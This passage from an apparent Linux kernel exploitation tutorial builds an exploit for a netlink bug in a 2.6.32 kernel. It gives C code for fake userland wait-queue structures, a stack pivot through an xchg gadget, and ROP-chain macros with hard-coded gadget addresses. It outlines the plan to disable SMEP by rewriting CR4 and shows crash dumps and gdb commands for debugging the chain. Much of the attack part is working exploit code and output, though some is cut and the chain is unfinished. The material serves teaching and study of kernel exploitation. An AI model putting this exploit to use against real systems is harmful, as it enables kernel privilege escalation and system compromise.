Let's update the exploit code (warning: g_uland_wq_elt is a pointer now, edit the code accordingly):

// 'volatile' keeps GCC from optimizing away accesses to those variables

static volatile struct list_head g_fake_next_elt;

static volatile struct wait_queue *g_uland_wq_elt;

static volatile char *g_fake_stack;

// kernel functions addresses

#define PANIC_ADDR ((void*) 0xffffffff81553684)

// kernel gadgets in [_text; _etext]

#define XCHG_EAX_ESP_ADDR ((void*) 0xffffffff8107b6b8)

static int payload(void);

// ----------------------------------------------------------------------------

static void build_rop_chain(uint64_t *stack)

{

memset((void*)stack, 0xaa, 4096);

*stack++ = 0;

*stack++ = 0xbbbbbbbbbbbbbbbb;

*stack++ = 0xcccccccccccccccc;

*stack++ = 0xdddddddddddddddd;

// FIXME: implement the ROP-chain

}

// ----------------------------------------------------------------------------

static int allocate_uland_structs(void)

{

// arbitrary value, must not collide with already mapped memory (/proc/<PID>/maps)

void *starting_addr = (void*) 0x20000000;

size_t max_try = 10;

retry:

if (max_try-- <= 0)

{

printf("[-] failed to allocate structures at fixed location\n");

return -1;

}

starting_addr += 4096;

g_fake_stack = (char*) _mmap(starting_addr, 4096, PROT_READ|PROT_WRITE,

MAP_FIXED|MAP_SHARED|MAP_ANONYMOUS|MAP_LOCKED|MAP_POPULATE, -1, 0);

if (g_fake_stack == MAP_FAILED)

{

perror("[-] mmap");

goto retry;

}

g_uland_wq_elt = (struct wait_queue*) _mmap(g_fake_stack + 0x100000000, 4096, PROT_READ|PROT_WRITE,

MAP_FIXED|MAP_SHARED|MAP_ANONYMOUS|MAP_LOCKED|MAP_POPULATE, -1, 0);

if (g_uland_wq_elt == MAP_FAILED)

{

perror("[-] mmap");

munmap((void*)g_fake_stack, 4096);

goto retry;

}

// paranoid check

if ((char*)g_uland_wq_elt != ((char*)g_fake_stack + 0x100000000))

{

munmap((void*)g_fake_stack, 4096);

munmap((void*)g_uland_wq_elt, 4096);

goto retry;

}

printf("[+] userland structures allocated:\n");

printf("[+] g_uland_wq_elt = %p\n", g_uland_wq_elt);

printf("[+] g_fake_stack = %p\n", g_fake_stack);

return 0;

}

// ----------------------------------------------------------------------------

static int init_realloc_data(void)

{

// ... cut ...

nlk_wait->task_list.next = (struct list_head*)&g_uland_wq_elt->task_list;

nlk_wait->task_list.prev = (struct list_head*)&g_uland_wq_elt->task_list;

// ... cut ...

g_uland_wq_elt->func = (wait_queue_func_t) XCHG_EAX_ESP_ADDR; // <----- STACK PIVOT!

// ... cut ...

}

// ----------------------------------------------------------------------------

int main(void)

{

// ... cut ...

printf("[+] successfully migrated to CPU#0\n");

if (allocate_uland_structs())

{

printf("[-] failed to allocate userland structures!\n");

goto fail;

}

build_rop_chain((uint64_t*)g_fake_stack);

printf("[+] ROP-chain ready\n");

// ... cut ...

}

As you might have noticed in build_rop_chain(), we set up an invalid temporary ROP-chain just for debugging purposes. Since the first gadget address is "0x00000000", it will provoke a double fault.

Let's launch the exploit:

...

[+] userland structures allocated:

[+] g_uland_wq_elt = 0x120001000

[+] g_fake_stack = 0x20001000

[+] g_uland_wq_elt.func = 0xffffffff8107b6b8

...

[ 79.094437] double fault: 0000 [#1] SMP

[ 79.094738] CPU 0

...

[ 79.097909] RIP: 0010:[<0000000000000000>] [<(null)>] (null)

[ 79.097980] RSP: 0018:0000000020001008 EFLAGS: 00010012

[ 79.098024] RAX: 000000001c123e60 RBX: 0000000000602c08 RCX: 0000000000000000

[ 79.098074] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000120001000

[ 79.098124] RBP: ffff88001c123ea8 R08: 0000000000000000 R09: 00007fa46644f700

[ 79.098174] R10: 00007fffd73a4350 R11: 0000000000000206 R12: 0000000000000001

[ 79.098225] R13: ffff88001c999eb8 R14: 0000000000000000 R15: 0000000000000000

...

[ 79.098907] Stack:

[ 79.098954] bbbbbbbbbbbbbbbb cccccccccccccccc dddddddddddddddd aaaaaaaaaaaaaaaa

[ 79.099209] <d> aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaa

[ 79.100516] <d> aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaa

[ 79.102583] Call Trace:

[ 79.103844] Code: Bad RIP value.

[ 79.104686] RIP [<(null)>] (null)

[ 79.105332] RSP <0000000020001008>

...

Perfect, just as expected! RSP is pointing to the second gadget of our ROP-chain in our fake stack. It double-faulted while trying to execute the first one which points at address zero (RIP=0).

Remember, ret first "pops" the value into rip and THEN executes it! That is why RSP is pointing to the second gadget (not the first one).
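To make the pop-then-execute order concrete, here is a tiny model of `ret` applied to the debugging chain above. It is only an illustration: `struct cpu_model` and `model_ret()` are hypothetical names, and the "stack" is a plain array standing in for the fake stack page.

```c
#include <assert.h>
#include <stdint.h>

struct cpu_model {
    uint64_t rip;
    uint64_t rsp;
};

/* Model of "ret": pop the 8-byte value at RSP into RIP, then RSP += 8.
 * 'stack' is the backing array and 'stack_base' the address of stack[0]. */
static void model_ret(struct cpu_model *cpu, const uint64_t *stack,
                      uint64_t stack_base)
{
    assert(cpu->rsp >= stack_base && (cpu->rsp - stack_base) % 8 == 0);
    cpu->rip = stack[(cpu->rsp - stack_base) / 8];
    cpu->rsp += 8;
}
```

With the fake stack at 0x20001000 holding `0, 0xbbbb..., 0xcccc..., 0xdddd...`, a single `model_ret()` leaves RIP at 0 and RSP at 0x20001008, which matches the register dump in the crash trace.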

We are now ready to write the real ROP-chain!

NOTE: Forcing a double-fault is a good way to debug a ROP-chain as it will crash the kernel and dump both the registers and the stack. This is the "poor man's" breakpoint :-).

Debugging the kernel with GDB

Debugging a kernel (without SystemTap) might be intimidating for newcomers. In the previous articles we already saw different ways to debug the kernel:

- SystemTap

- netconsole

However, sometimes you want to debug more "low-level" stuff and go step-by-step.

Just like any other binary (Linux being an ELF) you can use GDB to debug it.

Most virtualization solutions set up a gdb server that you can connect to in order to debug a "guest" system. For instance, while running a 64-bit kernel, VMware sets up a gdb server on port "8864". If yours does not, please read the manual.

Because of the chaotic/concurrent nature of a kernel, you might want to limit the number of CPUs to one while debugging.

Let's suppose we want to debug the arbitrary call primitive. One would be tempted to set a breakpoint just before the call (i.e. "call [rax+0x10]")... don't! The reason is that a lot of kernel paths (including interrupt handlers) actually call this code. That is, you will be breaking all the time without being in your own path.

The trick is to set a breakpoint earlier (callstack-wise) on a "not so used" path that is very specific to your bug/exploit. In our case, we will break in netlink_setsockopt() just before the call to __wake_up() (located at address 0xffffffff814b81c7):

$ gdb ./vmlinux-2.6.32 -ex "set architecture i386:x86-64" -ex "target remote:8864" -ex "b * 0xffffffff814b81c7" -ex "continue"

Remember that our exploit reaches this code three times: twice to unblock the thread and once to reach the arbitrary call. That is, use continue until the third break, then do step-by-step debugging (with "ni" and "si"). In addition, __wake_up() issues another call before __wake_up_common(), so you might want to use finish.

From here, this is just a "normal" debugging session.

WARNING: Remember to detach before leaving gdb. Otherwise, it can lead to "strange" issues that confuse your virtualization tool.

The ROP-Chain

In the previous section, we analyzed the machine state (i.e. registers) prior to using the arbitrary call primitive. We found a gadget that pivots the stack with an xchg instruction that uses 32-bit registers. Because of it, the "new stack" and our userland wait queue element aliased. To deal with it, we used a simple trick that avoids this aliasing while still pivoting to a userland stack. This helps to relax the constraints on future gadgets, avoid stack lifting, etc.

In this section, we will build a ROP-chain that:

- Stores ESP and RBP in userland memory for future restoration

- Disables SMEP by flipping the corresponding CR4 bit (cf. Defeating SMEP Strategies)

- Jumps to the payload's wrapper
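As a reminder of what "flipping the corresponding CR4 bit" means, SMEP is controlled by bit 20 of CR4. The sketch below only computes the value that the chain would later have to write back into CR4; the macro and function names are hypothetical, and the sample value used in the usage note is an arbitrary example, not one read from the target.

```c
#include <assert.h>
#include <stdint.h>

/* SMEP is bit 20 of the CR4 control register. */
#define CR4_SMEP_BIT  20
#define CR4_SMEP_MASK (1ULL << CR4_SMEP_BIT)

static int smep_enabled(uint64_t cr4)
{
    return (cr4 & CR4_SMEP_MASK) != 0;
}

/* Returns the CR4 value with SMEP cleared and all other bits untouched. */
static uint64_t cr4_without_smep(uint64_t cr4)
{
    uint64_t new_cr4 = cr4 & ~CR4_SMEP_MASK;

    assert(!smep_enabled(new_cr4));
    return new_cr4;
}
```

For example, `cr4_without_smep(0x1407f0)` gives `0x407f0`. Only the SMEP bit should change, since the other CR4 bits configure unrelated CPU features.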

Note that the things done here are very similar to what is done in "userland" ROP exploitation. In addition, this is very target dependent. You might have better or worse gadgets. This is just the ROP-chain we built with gadgets available in our target.

WARNING: It is very rare, but it can happen that the gadget you are trying to use will not work at runtime for some reason (e.g. trampoline, kernel hooks, unmapped memory). In order to prevent this, break before executing the ROP-chain and check with gdb that your gadgets are as expected in memory. Otherwise, simply choose another one.

WARNING-2: If your gadgets modify "non-scratch" registers (as we do with rbp/rsp) you will need to repair them by the end of your ROP-chain.

Unfortunate "CR4" gadgets

Disabling SMEP will not be the first "sub-chain" of our ROP chain (we will save ESP beforehand). However, because of the available gadgets that modify cr4, we will need additional gadgets to load/store RBP:

$ egrep "cr4" ranged_gadget.lst

0xffffffff81003288 : add byte ptr [rax - 0x80], al ; out 0x6f, eax ; mov cr4, rdi ; leave ; ret

0xffffffff81003007 : add byte ptr [rax], al ; mov rax, cr4 ; leave ; ret

0xffffffff8100328a : and bh, 0x6f ; mov cr4, rdi ; leave ; ret

0xffffffff81003289 : and dil, 0x6f ; mov cr4, rdi ; leave ; ret

0xffffffff8100328d : mov cr4, rdi ; leave ; ret // <----- will use this

0xffffffff81003009 : mov rax, cr4 ; leave ; ret // <----- will use this

0xffffffff8100328b : out 0x6f, eax ; mov cr4, rdi ; leave ; ret

0xffffffff8100328c : outsd dx, dword ptr [rsi] ; mov cr4, rdi ; leave ; ret

As we can see, all of those gadgets have a leave instruction preceding the ret. It means that using them will overwrite both RSP and RBP which can break our ROP-chain. Because of this, we will need to save and restore them.

Save ESP/RBP

In order to save the values of ESP and RBP we will use four gadgets:

0xffffffff8103b81d : pop rdi ; ret

0xffffffff810621ff : shr rax, 0x10 ; ret

0xffffffff811513b3 : mov dword ptr [rdi - 4], eax ; dec ecx ; ret

0xffffffff813606d4 : mov rax, rbp ; dec ecx ; ret

Since the gadget that writes to an arbitrary memory location reads its value from "eax" (32 bits), we use the shr gadget (twice, i.e. a 32-bit shift in total) to store the value of RBP in two steps (low and high bits). The ROP-chains are declared here:

// gadgets in [_text; _etext]

#define XCHG_EAX_ESP_ADDR ((uint64_t) 0xffffffff8107b6b8)

#define MOV_PTR_RDI_MIN4_EAX_ADDR ((uint64_t) 0xffffffff811513b3)

#define POP_RDI_ADDR ((uint64_t) 0xffffffff8103b81d)

#define MOV_RAX_RBP_ADDR ((uint64_t) 0xffffffff813606d4)

#define SHR_RAX_16_ADDR ((uint64_t) 0xffffffff810621ff)

// ROP-chains

#define STORE_EAX(addr) \

*stack++ = POP_RDI_ADDR; \

*stack++ = (uint64_t)addr + 4; \

*stack++ = MOV_PTR_RDI_MIN4_EAX_ADDR;

#define SAVE_ESP(addr) \

STORE_EAX(addr);

#define SAVE_RBP(addr_lo, addr_hi) \

*stack++ = MOV_RAX_RBP_ADDR; \

STORE_EAX(addr_lo); \

*stack++ = SHR_RAX_16_ADDR; \

*stack++ = SHR_RAX_16_ADDR; \

STORE_EAX(addr_hi);
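The effect of SAVE_RBP() can be modeled in plain C to check the arithmetic. This is a sketch under assumptions: the function names are hypothetical, the model assumes a little-endian machine (as x86-64 is), and `rebuild_rbp()` is only one plausible way to recombine the halves later, not necessarily how the final payload does it.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Model of "mov dword ptr [rdi - 4], eax": only the low 32 bits of RAX are
 * written. The chain pops (addr + 4) into RDI so the write lands on addr. */
static void model_store_eax(uint64_t *dst, uint64_t rax)
{
    uint32_t eax = (uint32_t)rax;

    memcpy(dst, &eax, sizeof(eax)); /* little-endian: low half of *dst */
}

/* Model of the SAVE_RBP() sub-chain. */
static void model_save_rbp(uint64_t rbp, uint64_t *lo, uint64_t *hi)
{
    uint64_t rax = rbp;         /* mov rax, rbp */

    model_store_eax(lo, rax);   /* STORE_EAX(addr_lo) */
    rax >>= 16;                 /* shr rax, 0x10 */
    rax >>= 16;                 /* shr rax, 0x10 */
    model_store_eax(hi, rax);   /* STORE_EAX(addr_hi) */
}

/* Hypothetical helper: recombine both halves into the original value. */
static uint64_t rebuild_rbp(uint64_t lo, uint64_t hi)
{
    assert(lo <= 0xffffffffULL && hi <= 0xffffffffULL);
    return (hi << 32) | lo;
}
```

With the RBP value seen in the earlier crash dump (0xffff88001c123ea8), the low half is 0x1c123ea8 and the high half is 0xffff8800. The upper 32 bits of each destination variable stay untouched, which is why they should start at zero.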

Let's edit build_rop_chain():

static volatile uint64_t saved_esp;

static volatile uint64_t saved_rbp_lo;

static volatile uint64_t saved_rbp_hi;

static void build_rop_chain(uint64_t *stack)

{

memset((void*)stack, 0xaa, 4096);

SAVE_ESP(&saved_esp);

SAVE_RBP(&saved_rbp_lo, &saved_rbp_hi);

*stack++ = 0; // force double-fault

// FIXME: implement the ROP-chain

}

Before proceeding, you may want to be sure that everything goes well up to this point. Use GDB as explained in the previous section!

Read/Write CR4 and dealing with "leave"

As mentioned before, all our gadgets that manipulate CR4 have a leave instruction before the ret. The leave instruction does the following (in this order):

- RSP = RBP

- RBP = Pop()
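The two steps above, followed by the ret, can be modeled as follows. This is only an illustrative sketch: `struct regs_model`, `model_pop()` and `model_leave_ret()` are hypothetical names, and memory is represented by a small array mapped at a chosen base address.

```c
#include <assert.h>
#include <stdint.h>

struct regs_model {
    uint64_t rip;
    uint64_t rsp;
    uint64_t rbp;
};

/* Pop one 8-byte value from the modeled stack ('mem' starts at 'base'). */
static uint64_t model_pop(struct regs_model *r, const uint64_t *mem,
                          uint64_t base)
{
    uint64_t value;

    assert(r->rsp >= base && (r->rsp - base) % 8 == 0);
    value = mem[(r->rsp - base) / 8];
    r->rsp += 8;
    return value;
}

/* Model of the "leave ; ret" tail shared by the CR4 gadgets. */
static void model_leave_ret(struct regs_model *r, const uint64_t *mem,
                            uint64_t base)
{
    r->rsp = r->rbp;                    /* leave, step 1: RSP = RBP   */
    r->rbp = model_pop(r, mem, base);   /* leave, step 2: RBP = Pop() */
    r->rip = model_pop(r, mem, base);   /* ret:           RIP = Pop() */
}
```

The model shows that the next gadget address is fetched from `[RBP + 8]`, not from the current stack position. So whatever value RBP holds just before such a gadget decides where the chain continues.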

In this ROP-chain, we will use three gadgets:

0xffffffff81003009 : mov rax, cr4 ; leave ; ret

0xffffffff8100328d : mov cr4, rdi ; leave ; ret

0xffffffff811b97bf : pop rbp ; ret

Since RSP is overwritten while executing the leave instruction, we have to make sure that it does not break the chain (i.e. RSP is still right).